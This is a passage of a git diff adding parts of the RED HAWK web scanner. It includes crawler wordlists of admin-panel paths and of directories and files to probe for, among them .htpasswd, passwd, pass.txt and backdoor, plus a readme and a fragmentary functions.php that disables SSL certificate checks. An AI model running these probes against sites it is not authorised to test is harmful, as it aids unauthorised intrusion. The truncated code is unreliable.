b/redhawk/config.php @@ -0,0 +1,15 @@ + diff --git a/redhawk/crawl/admin.ini b/redhawk/crawl/admin.ini new file mode 100644 index 0000000..e31ea2e --- /dev/null +++ b/redhawk/crawl/admin.ini @@ -0,0 +1 @@ +admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.php,admin/index.php,admin/login.php,admin/admin.php,admin/account.php,admin_area/admin.php,admin_area/login.php,siteadmin/login.php,siteadmin/index.php,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.php,bb-admin/index.php,bb-admin/login.php,bb-admin/admin.php,admin/home.php,admin_area/login.html,admin_area/index.html,admin/controlpanel.php,admin.php,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.php,cp.php,administrator/index.php,administrator/login.php,nsw/admin/login.php,webadmin/login.php,admin/admin_login.php,admin_login.php,administrator/account.php,administrator.php,admin_area/admin.html,pages/admin/admin-login.php,admin/admin-login.php,admin-login.php,bb-admin/index.html,bb-admin/login.html,acceso.php,bb-admin/admin.html,admin/home.html,login.php,modelsearch/login.php,moderator.php,moderator/login.php,moderator/admin.php,account.php,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.php,admincontrol.php,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.php,adminarea/index.html,adminarea/admin.html,webadmin.php,webadmin/index.php,webadmin/admin.php,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.php,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.php,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.php,wp-login.php,adminLogin.php,admin/adminLogin.php,home.php,admin.php,adminarea/index.php,adminarea/admin.php,adminarea/login.php,panel-administracion/index.php,panel-administracion/admin.php,modelsearch/index.php,modelsearch/admin.php,admincontrol/login.php,adm/admloginuser.php,admloginuser.php,admin2.php,admin2/login.php,admin2/index.php,usuarios/login.php,adm/index.php,adm.php,affiliate.php,adm_auth.php,memberadmin.php,administratorlogin.php,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,account.asp,admin/account.asp,admin/index.asp,admin/login.asp,admin/admin.asp,admin_area/admin.asp,admin_area/login.asp,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/admin.html,admin_area/login.html,admin_area/index.html,admin_area/index.asp,bb-admin/index.asp,bb-admin/login.asp,bb-admin/admin.asp,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,administrator/index.html,administrator/login.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator.html,moderator/login.html,moderator/admin.html,account.html,controlpanel.html,admincontrol.html,admin_login.html,panel-administracion/login.html,admin/home.asp,admin/controlpanel.asp,admin.asp,pages/admin/admin-login.asp,admin/admin-login.asp,admin-login.asp,admin/cp.asp,cp.asp,administrator/account.asp,administrator.asp,acceso.asp,login.asp,modelsearch/login.asp,moderator.asp,moderator/login.asp,administrator/login.asp,moderator/admin.asp,controlpanel.asp,admin/account.html,adminpanel.html,webadmin.html,pages/admin/admin-login.html,admin/admin-login.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,user.asp,user.html,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,adminarea/index.html,adminarea/admin.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admin/admin_login.html,admincontrol/login.html,adm/index.html,adm.html,admincontrol.asp,admin/account.asp,adminpanel.asp,webadmin.asp,webadmin/index.asp,webadmin/admin.asp,webadmin/login.asp,admin/admin_login.asp,admin_login.asp,panel-administracion/login.asp,adminLogin.asp,admin/adminLogin.asp,home.asp,admin.asp,adminarea/index.asp,adminarea/admin.asp,adminarea/login.asp,admin-login.html,panel-administracion/index.asp,panel-administracion/admin.asp,modelsearch/index.asp,modelsearch/admin.asp,administrator/index.asp,admincontrol/login.asp,adm/admloginuser.asp,admloginuser.asp,admin2.asp,admin2/login.asp,admin2/index.asp,adm/index.asp,adm.asp,affiliate.asp,adm_auth.asp,memberadmin.asp,administratorlogin.asp,siteadmin/login.asp,siteadmin/index.asp,siteadmin/login.html,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.cfm,admin/index.cfm,admin/login.cfm,admin/admin.cfm,admin/account.cfm,admin_area/admin.cfm,admin_area/login.cfm,siteadmin/login.cfm,siteadmin/index.cfm,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.cfm,bb-admin/index.cfm,bb-admin/login.cfm,bb-admin/admin.cfm,admin/home.cfm,admin_area/login.html,admin_area/index.html,admin/controlpanel.cfm,admin.cfm,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.cfm,cp.cfm,administrator/index.cfm,administrator/login.cfm,nsw/admin/login.cfm,webadmin/login.cfm,admin/admin_login.cfm,admin_login.cfm,administrator/account.cfm,administrator.cfm,admin_area/admin.html,pages/admin/admin-login.cfm,admin/admin-login.cfm,admin-login.cfm,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.cfm,modelsearch/login.cfm,moderator.cfm,moderator/login.cfm,moderator/admin.cfm,account.cfm,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.cfm,admincontrol.cfm,admin/adminLogin.html,acceso.cfm,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.cfm,adminarea/index.html,adminarea/admin.html,webadmin.cfm,webadmin/index.cfm,webadmin/admin.cfm,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.cfm,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.cfm,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.cfm,wp-login.cfm,adminLogin.cfm,admin/adminLogin.cfm,home.cfm,admin.cfm,adminarea/index.cfm,adminarea/admin.cfm,adminarea/login.cfm,panel-administracion/index.cfm,panel-administracion/admin.cfm,modelsearch/index.cfm,modelsearch/admin.cfm,admincontrol/login.cfm,adm/admloginuser.cfm,admloginuser.cfm,admin2.cfm,admin2/login.cfm,admin2/index.cfm,usuarios/login.cfm,adm/index.cfm,adm.cfm,affiliate.cfm,adm_auth.cfm,memberadmin.cfm,administratorlogin.cfm,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.js,admin/index.js,admin/login.js,admin/admin.js,admin/account.js,admin_area/admin.js,admin_area/login.js,siteadmin/login.js,siteadmin/index.js,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.js,bb-admin/index.js,bb-admin/login.js,bb-admin/admin.js,admin/home.js,admin_area/login.html,admin_area/index.html,admin/controlpanel.js,admin.js,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.js,cp.js,administrator/index.js,administrator/login.js,nsw/admin/login.js,webadmin/login.js,admin/admin_login.js,admin_login.js,administrator/account.js,administrator.js,admin_area/admin.html,pages/admin/admin-login.js,admin/admin-login.js,admin-login.js,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.js,modelsearch/login.js,moderator.js,moderator/login.js,moderator/admin.js,account.js,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.js,admincontrol.js,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.js,adminarea/index.html,adminarea/admin.html,webadmin.js,webadmin/index.js,acceso.js,webadmin/admin.js,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.js,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.js,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.js,wp-login.js,adminLogin.js,admin/adminLogin.js,home.js,admin.js,adminarea/index.js,adminarea/admin.js,adminarea/login.js,panel-administracion/index.js,panel-administracion/admin.js,modelsearch/index.js,modelsearch/admin.js,admincontrol/login.js,adm/admloginuser.js,admloginuser.js,admin2.js,admin2/login.js,admin2/index.js,usuarios/login.js,adm/index.js,adm.js,affiliate.js,adm_auth.js,memberadmin.js,administratorlogin.js,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.cgi,admin/index.cgi,admin/login.cgi,admin/admin.cgi,admin/account.cgi,admin_area/admin.cgi,admin_area/login.cgi,siteadmin/login.cgi,siteadmin/index.cgi,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.cgi,bb-admin/index.cgi,bb-admin/login.cgi,bb-admin/admin.cgi,admin/home.cgi,admin_area/login.html,admin_area/index.html,admin/controlpanel.cgi,admin.cgi,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.cgi,cp.cgi,administrator/index.cgi,administrator/login.cgi,nsw/admin/login.cgi,webadmin/login.cgi,admin/admin_login.cgi,admin_login.cgi,administrator/account.cgi,administrator.cgi,admin_area/admin.html,pages/admin/admin-login.cgi,admin/admin-login.cgi,admin-login.cgi,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.cgi,modelsearch/login.cgi,moderator.cgi,moderator/login.cgi,moderator/admin.cgi,account.cgi,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.cgi,admincontrol.cgi,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.cgi,adminarea/index.html,adminarea/admin.html,webadmin.cgi,webadmin/index.cgi,acceso.cgi,webadmin/admin.cgi,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.cgi,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.cgi,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.cgi,wp-login.cgi,adminLogin.cgi,admin/adminLogin.cgi,home.cgi,admin.cgi,adminarea/index.cgi,adminarea/admin.cgi,adminarea/login.cgi,panel-administracion/index.cgi,panel-administracion/admin.cgi,modelsearch/index.cgi,modelsearch/admin.cgi,admincontrol/login.cgi,adm/admloginuser.cgi,admloginuser.cgi,admin2.cgi,admin2/login.cgi,admin2/index.cgi,usuarios/login.cgi,adm/index.cgi,adm.cgi,affiliate.cgi,adm_auth.cgi,memberadmin.cgi,administratorlogin.cgi,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/login.html,admin_area/index.html,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin_area/admin.html,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,adminarea/index.html,adminarea/admin.html,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,account.html,controlpanel.html,admincontrol.html diff --git a/redhawk/crawl/others.ini b/redhawk/crawl/others.ini new file mode 100644 index 0000000..b53c847 --- /dev/null +++ b/redhawk/crawl/others.ini @@ -0,0 +1 @@ +images,css,LC_MESSAGES,js,tmpl,lang,default,README,templates,langs,config,GNUmakefile,themes,en,img,admin,user,plugins,show,level,exec,po,icons,classes,includes,_notes,system,language,MANIFEST,modules,error_log,views,backup,db,lib,faqweb,articleweb,system32,skins,_vti_cnf,models,news,cache,CVS,main,html,faq,update,extensions,jscripts,Packages,languages,features,pix,categoryblog,docs,thumbs,test,php,assets,sp2qfe,data,sp2gdr,include,scripts,helpers,Extension,media,_vti_bin,webalizer,common,logs,search,customer,dialogs,src,cfdocs,INSTALL,winnt,rvtheme_admin,rvtheme,default_admin,default1,LICENSE,Entries,10,treeNav,locale,internals,style,Root,Repository,imapd,flags,defaultColorConf,template,authweb,COPYING,de_DE,english,fr_FR,asp,tmp,sql,source,doc,blocks,backgrounds,maint,help,nl_NL,administrator,version,category,Makefile,styles,toolbar,ra,iissamples,files,PDF,22,catalog,libs,simpletest,database,06,samples,libraries,fc_functions,16,11,fr,bg,01,perl,controllers,12,upload,no_NO,components,class,servlet,de,32,1033,temp,phpunit,info,_vti_pvt,09,utils,fonts,contrib,app,tables,it,editor,demo,wget,ChangeLog,14,03,ru,login,graphics,elements,cfm,bullets,Sources,silver,07,05,dialog,02,xmlrpc,smiley,msadc,mail,connectors,black,backups,GalleryStorage,Auth,04,javascript,install,archive,_private,uploads,table,jqueryui,filemanager,email,dk,cgi,users,sv_SE,index,functions,examples,error,browser,TODO,13,pt_BR,misc,image,com_content,categories,calendar,buttons,404,tools,placeholder,phpmailer,old,moodle2,bin,auth,Adapter,tinymce,msn,links,inc,feed,da_DK,apps,advanced,CREDITS,2010,08,moddata,mod_login,local,ja_JP,forum,fi_FI,drivers,cs_CZ,behaviors,secret,pt_PT,pl_PL,os,office2003,geshi,gallery,flash,conf,caspsamp,application,access,RETAIL,tablecommands,pages,msft,log,fck_template,fck_select,fck_link,fck_image,fck_docprops,fck_about,documents,custom,bbcode,CHANGES,2009,2003,tests,spellerpages,pdf,newsletters,new,library,it_IT,group2,fckeditor,fck_spellerpages,etc,comments,blue,File,CHANGELOG,15,windows,stats,pear,menu,layout,inlinepopups,group7,group6,group5,group4,framework,es,com_contact,blog,aspx,article,0011,0009,zh_TW,xml,postgres,orders,manage,lasso,iisadmpwd,green,forums,file,dtd,downloads,dev,com_weblinks,com_search,check.bat,build,T_IMG,Server,Scripts,LST,IMG,IISADMPWD,HTML,DTL,BNR,60,2011,stories,session,section,refs,print,paste,password,o2k7,mod_search,group8,group3,group1,fullscreen,es_ES,el_GR,download,com_poll,com_newsfeeds,banners,backupdata,autogrow,Promotion,NEWS,DTL_ETC,Client,20,zh_CN,www,stat,smilies,simple,setup,save,rvscompodb,ru_RU,readme,preview,poll,mysql,mod_newsflash,mod_custom,java,i386,home,graphs,frontpage,ext,export,exair,epoch,en_US,domit,core,contact,component,commandclasses,cfusion,analog,actions,_source,UPGRADE,Text,TB_IMG,Storage,Sites,MOB,Images,AUTHORS,ADD_SALE,25,21,00,video,tiny_mce,status,spellchecker,register,private,passwords,oracle,filter,fck_flash,example,editors,directionality,description,content,compat,classic,bbs,_vti_aut,Search,24,23,17,0804,0404,zImage,upgrade,updates,theme,sqlqhit.asp,sk_SK,simplecommands,server,secure,resources,report,py,pub,policy,pagebreak,objects,mod_mainmenu,mod_latestnews,mod_footer,mod_feed,lt_LT,interfaces,i18n,german,ftp,exampleapp,en_GB,contextmenu,configs,com_media,ccbill,branches,Samples,PEAR,OPD,Mail,Knowledge,Filter,Fast_Lane_Checkout,Docs,DLL,0012,0010,0007,yui,xp,weblink,util,ui,tabs,swf,rss,ro_RO,red,payment,nl,music,module,mod_stats,mod_banners,members,layer,khepri,hooks,header,ga_IE,fun,french,extra,element,disk1,dir,devel,com_banners,blogweb,banner,ar,aqua,advlink,advimage,_samples,WORD,MSFT,Image,HEAD,Driver,Decorator,Archive,2008,19,0416,0014,0013,0006,webmail,webcart,tree,tcpdf,support,storage,sl_SI,setting,security,searchreplace,script,schema,safari,rtl,root,plugin,platform,noneditable,mod_poll,mime,meta,magic,linux,kernel,jsp,iespell,hu_HU,hidden,helper,fullpage,format,findreplace,extras,expeval,event,enu,emotions,document,directory,com_user,ca_ES,bugs,beta,base,applets,apache,alpha,advhr,_plugins,_mem_bin,WINDOWS,ViewCode.asp,SpryAssets,Rpc,Release,PBServer,One_Page_Checkout,OEM,News_Management,Manufacturers,MSADC,Gift_Certificates,Extra_Fields,Element,Discount_Coupons,Customer_Reviews,30,27,2004,18,040c,.htpasswd,xhtmlxtras,web,visualchars,utilities,usage,upgrades,uk_UA,testing,store,smarty,setupdir,services,rhuk_milkyway,retail,python,public_html,project,phpMyAdmin,nonbreaking,my_files,mod_syndicate,mod_random_image,lightbox,ko_KR,iso,installer,icon,font,filters,eu_ES,dll,databases,configure,compat2x,clearlooks2,cd,bg_BG,audio,ajax,adapters,about,UPGRADING,ThemeOffice,DRIVERS,ALL,42,2002,000a,.DS_Store,wwwboard,webmaster,weblog,view,tr_TR,thumbnails,themed_graphics,tags,stills,sounds,snippets,simplepie,shipping,sdk,rpc,renderer,popups,photos_history,photo_events,passwd,pass,other,order.log,options,network,netstat,mod,mimetypes,media_index,logfiles,logfile,lang_english,jquery,joomla,imp,id_ID,guests,guestbook,form,filesystems,exchange,easylog,dragresizetable,devices,design,dbg,cssOutsider,cr,cmd.exe,cli,cart,button,bug,bb,autosave,archives,applications,amd64,ads,_sample,WIN98,WIN95,WHATISTHIS,VERSION,SYSTEM,Reader,DatabaseStorage,Cache,31,28,2006,001d,000b,.thumbs,wordpress,win95,win2000,vi,tech,tabfocus,sun,ssi,spam,skin,seminaria,scriptaculous,samba,sam,reset,remotes,remind,projects,prep,phputf8,phpinputfilter,photo,pattemplate,orange,newsfeed,nb_NO,mod_wrapper,mod_breadcrumbs,message,lv_LV,list,ka,ja_purity,insertdatetime,hu,he_IL,guest,general,gd,gcc,foo,filesystem,fi,fck_universalkey,fa_IR,el,datafiles,da,cyber,controls,code,client,ca,brand,backdoor,authadmin,articles,art,arc,af,administration,accounting,account,_vti_adm,OpenID,NIF,Latest,ImageManager,CSS,Block,All,Action,9x,29,2007,2005,1.2,001e,zip,wwwstat,wwwlog,wstats,wsdocs,white,webstats,webstat,webmaster_logs,weblogs,vivid_dreams,vax,userdb,tr,technote,sun2,sshots,sparc,siteadmin,shtml.dll,showcode.asp,shark,shared,secrets,sales,s5,releases,registry,rating,publish,public,protected,pl,pics,phpxmlrpc,phpgacl,pass.txt,par2,papers,overrides,orders.txt,openid,oordir,oldfiles,old_files,nuke,no,nn_NO,my_pictures,my_documents,ms,monitor,mod_whosonline,mod_sections,mod_related_items,mod_mostread,mnet,mk,memberfiles,language_files,jscalendar,issamples,index.cgi,index.cfm,import,idn,htdocs,htbin,headers,globals,fashion_mosaic,fa,expelval,et_EE,et,dtree,dos,dcforum,customers,css_styles,com_mailto,clientes,cliente,cgiwin,cgishl,cgiscripts,cgiscript,cgis,cgilib,cgibin,cgi_local,cgi_bin,cfide,cfapps,cc,cats,boxes,boot,bn,bitfolge,billing,beez,bank,backend,alex,albums,agentes,adsamples,adpassword.txt,admisapi,adminweb,adminuser,administracion,adminfiles,admcgi,adm,addons,ad,active.log,access.txt,access.log,_testcases,Zend,Yadis,Xtras,XML,Util,Templates,SQLQHit.asp,SETUPDIR,Response,Resource,Request,Renderer,RTE_configuration,Plugin,Net,Membership,Media,M_images,MNU_blank_data,Http,Helper,Function,FCKeditor,80,26,yacs,wp,word,wood,vb,v2,us,uk,ug,tiger,thumb,tex,test2,test1,templates_c,tag,tab,sys,sv,super,stars,sphinx,sparc64,social,sm,slider,site,singer,shop,settings,service,servers,selector,rvslib,rvsincludefile,ro,reports,ready,pt,prefs,posters,ports,pop,polls,phpInputFilter,pdf_fonts,pcl,patTemplate,packages,output,notes,networks,native,mp3,mod_archive,mobile,messages,mcpuk,mbstring,math,manual,live,legacy,leaflet,ja,item,ideas,hw,h_teal,h_green,h_cherry,global,gl,fy,fsbb,forms,fax,external,ethernet,es_AR,equipment,environment,engines,eg,edit,diagon,copy_this,com_wrapper,codes,cert,centosplus,captcha,books,big,be,background,avatars,authentication,asms,archive_tar,amiga,ads_data,adodb,acrobat,Win9x,Win98,Win2k,WebShop,WINME,VER_sel_data,SYMBOLS,ReleaseNotes,RELEASE_NOTES,Query,Provider,MNU_top_data,MNU_menu_data,Linux,LICENCE,HTTP,Form,Commands,Changelog,AMD64bit,46,37,1.4,1.3,zoom,zinfandel,zen,yoda,xstandard,xsql,xinu,x86_64,wysiwyg,wwwstats,work,wombat,wlw,win.ini,vms,vlsi,virus,vector,user2,user1,ur,unix,trac,topics,tolkien,tl,tinman,ti,th,te,ta,symbols,sun3,sulu,steps,status.php3,standart,standards,staff,ssl,sr_YU,sr,sql.php3,sponsors,spock,spiffyCal,spiff,spanish,sneezy,smiles,slideshow,slices,sl,sk,si,shtml.exe,shrdlu,share,sh,sequent,sei,sanfran,rti,rte,ronin,riacs,remote,question,pw,ptj,ps,protector,proftpd,profile,printer,portal,pm,piranha,pic,phpnuke,phpBB2,perso,perf,pegasus,pds,pcat,payments,parts,pagers,outlaw,original,orca,official,number,nt4,newsletter,net,my,multianswer,mtxinu,mr,mod_quickicon,mms,ml,mips,maui,matrix,marlboro,mainsail,main.cgi,lover,logsaccess_log,link,leo,lehi3b15,laurent,labs,la,klingon,kilroy,jellystone,isos,internet,iis,idea,ibmpc,ht,hr,hp,howitworks,hi,heads,he,hardware,gu,groups,gq,gonzo,gold,gnome,gb,gandalf,ga,fruit,foobar,files.pl,fasttrack,excalibur,events,etaoin,elephant,einstein,eecs,eb,easton,dvd,dv,dopey,domcfg.nsf,documentation,dm,dl,dists,dist,demos,dbi,darkblue_orange,cy_GB,cy,cube,csr,csee,cs,course,cosmos,cosmic,cookie,convex,commerce,com_messages,com_menus,com_massmail,com_login,com_languages,com_installer,com_frontpage,com_cpanel,com_config,com_checkin,com_categories,com_cache,com_admin,com,codebrws.asp,cm,cls,cic,catalog_type.asp,cat,caliban,caip,c6,c5,c4,c3,c2,bugsbunny,bs,boeing,bloomcounty,block,bd,bc,batcomputer,bar,ba,b9,b8,b7,b6,b4,b3,b2,b1,b0,aw,audubon,atc,async,ast,arm,apl,ans,am,afp,ae,admentor,ab,aardvark,aa,a9,a8,a7,a5,a4,a3,a2,a1,_vti_log,_themes,_packager,Writer,WINXP,WIN2000,View,SYMBOLS.PRI,Photos,Pear,PDG_Cart,Message,Log,INF,HISTORY,Flash,Feed,Entry,Dos,Disk1,Data,DOS,Classes,Builder,Books,App,Administrator,70,69,68,67,62,61,54,52,50,41,35,33,2009_Q4,0816,011,0019,xv,wsc,wpThumbnails,winxp,winnt40,winnt351,win9x,wifi,wei,waves,voice,vm,vim,videos,url,unknown,um,tulip,trw,translate,transformations,top,tmc,thunderbird,theory,tesseract,terminal,talk,tac,sysadmin,swift,survey,suphp,supercache,sub,stylesheets,studio,structure,ss,squirrelspell,spool,spice,speech,spamcop,solaris,software,soap,snapshots,silk,sierra,shans9,shans8,shans7,shans6,shans5,shans4,shans3,shans2,shans10,shans1,sentinel,sent_subfolders,sensor,seit,scr,scm,sample,s3,rvs_library,ruby,rpm,rouge,roskilde,rock,reviews,resource,research,relnotes,recruit,recaptcha,reading,raw,rav,psd,prime,pre,portlet,popup,pictures,picasa,phpmyadmin,phototheque,photos,phoenix,persian,pdb,parameter,panel,packaging,oxford,os2,odbc,ocean,nwclient,nss,note,nlm,nif,nic,next,newmail,mutt,msql,msi,mp,mosaic,module1,mods,modifier,mod_unread,mod_toolbar,mod_title,mod_submenu,mod_status,mod_popular,mod_online,mod_menu,mod_logged,mod_latest,mn,microsoft,message_details,mercury,menus,martin,marlin,maps,mango,manager,mailto,mailman,mail_fetch,mag,mac,lv,luna,lucid,lori,logos,listcommands,lighter,light,libImaging,lg_lexique,layouts,lang_french,kodak,km,jscript,jerome,jenkins,jazz,is_IS,intranet,ingres,infos,images_small,id,ias,husky,hl,highslide,hf,head,hardy,handler,gwen,gs,group,gross,gr,gift,getpot,geo,generic,gateway,gap,gallery2,galaxy,fusion,function,ft,freeradius,frames,fortune,food,folders,flex,fj,fixtures,ff,fe,fd,fc,fb,f2,f1,experimental,exclude,europe,eunomia,eu,espanol,enrol,ems,emerald,eigen,ef,ee,ed,eco,ec,ea,e4,e3,e2,e1,e0,dsl,development,delete_move_next,dc,davinci,d9,d8,d7,d6,d5,d4,d3,d2,d1,d0,cz,custombuild,cp,counter,count,control,conn,comment,comctl,com_users,com_trash,com_templates,com_sections,com_plugins,com_modules,cogito,cobalt,cn,cj,circe,ci,chs,chips,chimera,chat,changelog,cf,ce,cdrom,cck,cb,c9,c8,c7,c1,c0,bulkquery,bug_report,bsd,brown,bridge,brick,br,bluewhite,bio,bf,ben,bckgnd,bard,back,b5,awstats,avatar,attachments,atari,at,asd,apt,apple,ams,amadeus,alt,alley,algor,aiken,adobeair,adara,ac,abc,a6,_vti_txt,_fpclass,YouTube,WINNT,Tools,TemplateCache,Tag,TEMPLATE,Strategy,Stat,Spreadsheets,Sitemap,Services,SP2QFE,SETUP,RAID,Pdo,Pager,PRIVACY,OutputFilter,NLS,Mysqli,Music,Modifier,Math,MS,MIME,Logs,Language,Kind,KOR,JPN,InputFilter,Health,HELP,HEADER.images,Geo,Gdata,Gbase,Gapps,Font,FAQ,Exif,Dump,DublinCore,Documents,Default,Db,Date,DISK1,Container,Console,Common,Captcha,Calendar,CRYPTO,COMMON,CHT,CHS,CAPTCHA,Admin,AOL,8.2,8.1,72,71,66,65,64,63,59,58,57,56,55,53,51,49,48,47,45,43,40,39,38,36,2009_Q3,2009_Q2,2009_Q1,2001,2.2,1999,1998,1997,1996,1995,1984,1000,.smileys,.cvsignore,0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z diff --git a/redhawk/crawl/readme.txt b/redhawk/crawl/readme.txt new file mode 100644 index 0000000..bbe09db --- /dev/null +++ b/redhawk/crawl/readme.txt @@ -0,0 +1,23 @@ +This is a Part of RED HAWK + +[ D E S C R I P T I O N ] + +This directory contains mainly 4 files namely + +- admin.ini +- backup.ini +- others.ini +- readme.txt + +The first three files are mendetory for the RED HAWK scanner. These files have the list of files and directories which the scanner uses for crawling. + +[ U S A G E & W A R N I N G S ] + +• You can edit these files to put your own customized list. + +• The 3 different ini files have list of different kinds of files and directories. + - admin.ini : contains a list of admin pages or admin directories. + - backup.ini : contains a list of commonly known backup files. + - others.ini : basically all the other lists. + +• Please NOTE the lists are separeted by COMMA "," any other type of separation used will cause error while crawling. diff --git a/redhawk/functions.php b/redhawk/functions.php new file mode 100644 index 0000000..d080fd4 --- /dev/null +++ b/redhawk/functions.php @@ -0,0 +1,358 @@ +]*>(.*?)<\/title>/ims', $data, $matches) ? $matches[1] : null; + return $title; + } + function userinput($message){ + global $white, $bold, $greenbg, $redbg, $bluebg, $cln, $lblue, $fgreen; + $yellowbg = "\e[100m"; + $inputstyle = $cln . $bold . $lblue . "[#] " . $message . ": " . $fgreen ; + echo $inputstyle; + } +function WEBserver($urlws){ + stream_context_set_default( [ + 'ssl' => [ + 'verify_peer' => false, + 'verify_peer_name' => false, + ], +]); + $wsheaders = get_headers($urlws, 1); + if (is_array($wsheaders['Server'])) { $ws = $wsheaders['Server'][0];}else{ + $ws = $wsheaders['Server']; + } + if ($ws == "") + { + echo "\e[91mCould Not Detect\e[0m"; + } + else + { + echo "\e[92m$ws \e[0m"; + } +} + + +function cloudflaredetect($reallink){ + + $urlhh = "http://api.hackertarget.com/httpheaders/?q=" 